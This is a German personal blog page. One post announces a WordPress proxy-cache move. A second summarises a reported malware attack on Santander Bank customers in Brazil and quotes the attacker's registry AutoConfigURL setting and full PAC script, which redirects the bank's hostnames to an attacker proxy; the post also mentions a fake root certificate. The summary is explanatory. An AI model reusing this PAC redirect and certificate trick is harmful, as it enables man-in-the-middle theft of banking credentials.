Keine Blog Stats mehr

Hallo Besucher,

meine Blogstats werden in den nächsten 30 Tagen vermutlich gegen 0 gehen. Das liegt natürlich nicht daran, daß das Interesse an den Artikeln nachlässt, sondern das Gegenteil ist der Fall 🙂

Deswegen wurde das Blog auf einen hauseigenen Cachingdienst umgezogen, der die Seiten jetzt auch sehr, sehr viel schneller ausliefert 🙂 Ihr habt das vermutlich gemerkt, als Ihr die Seite aufgerufen habt. Von weit mehr als einer Sekunde Ladezeit sind wir runter auf 0.3s 😉 Das sind jetzt praktisch statische Seiten 😀

Wer wissen will, wie das geht, weil sein WordPress ihm auch zu langsam ist, der kann ja mal am 6.9. zu Linux am Dienstag kommen, da werden wir ProxyCaches mal näher betrachten. Für alle die nicht kommen werden sei gesagt, daß der Komfort von WordPress erhalten bleibt, aber der Speed von puren HTML Seiten erzielt wird.

Das entlastet natürlich auch den Server, weil er viel weniger PHP bearbeiten muß, aber vor allem gehts einfach sehr, sehr viel schneller zu laden.

Alles Gute,
Marius

Wie man Onlinebanking belauscht

„Mami, warum darf ich nicht dieses Attachment öffnen?!!“

„DESWEGEN, Kind :  sans.edu – Example of Targeted Attack Through a Proxy PAC File „

Beschrieben wird in dem verlinkten Artikel ein Angriff auf die Benutzer der Santanderbank in Brasilien. Jetzt blocke ich bei mir eh alles was *com.br am Ende hat, da ich in Brasilien keine Freunde habe, aber scheinbar sehr viel zwilichtige Gestalten gerne meine Freund werden wollen, naja.. vermutlich doch eher Freund meines Rechners 🙂 . Egal, jedenfalls spart einem son Block jede Menge Spams auf Portugiesisch, dessen ich zwar entfernt mächtig bin, es mich aber nicht interessiert. Wer noch was pauschal blocken will, hier noch zwei Evergreens : „*com.ar“, „*com.ag“ und „*@zoho.com“ .  Zoho.com ist gefühlt vermutlich die größte Spamschleuder des Planeten.

Was aber tatsächlich am meisten Spams verhindert hat, war unserem Mailserver zu erzählen, daß er nur noch TLS Verbindungen akzeptiert. Das hat sämtliche Spambots kalt erwischt ( und noch dazu das BSI, Weltbild, Power-Netz, Otto und diverse andere Quellen unerwünschter Wer … ähm Newsletter … 😀 )

Man sollte sich auch nichts erzählen lassen, wer als Mailadmin kein TLS aktiviert hat, hat seinen Job nicht ordentlich gemacht. Wer einem also keine EMails mehr senden kann, sollte dafür die Schuld nicht beim Empfänger, sondern bei sich selbst suchen. Im zweiten Jahrzehnt des 21. Jahrhunderts gehört TLS einfach in jeden Mailserver, egal wo auf der Welt.

Zurück zum Angriff auf Kunden der Santander Bank

Der Artikel beschreibt, das eines Tages eine Email kam… so fängt es heute eigentlich immer an ;)… in der ein böses Attachment war.. ( deswegen haben wir Leute auf der Whiteliste, die uns Attachments schicken dürfen ) . Das Attachment enthielt eine kleine Schadsoftware die nichts weiter gemacht hat, als die Proxyeinstellungen von Winblöd zu ändern.

\REGISTRY\USER\S-1-5-21-xxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://chrome-ie.com.br/1.png

In dem „Bild“ steht natürlich nur Text drin:

function FindProxyForURL(url, host)
{
var a = "PROXY 200.98.202.51:1023";
if (shExpMatch(host, "www.san*ander.com.br*")) {
     return a;
}

if (shExpMatch(host, "san*ander.com.br*")) {
     return a;
}

return "DIRECT";
}

Dieses Proxyscript sorgt dann am Ende dafür, daß die Aufrüfe an die Bank zu dem Proxy Server umgeleitet werden. Damit HTTPS geht, jubelt einem das Attachment dann noch ein FAKE Root Cert der Santander Bank unter.  Fertig ist der Onlinebanking-Man-in-the-Middle-Angriff .

Bei Fragen wenden Sie sich bitte an die Designer von Windows 😀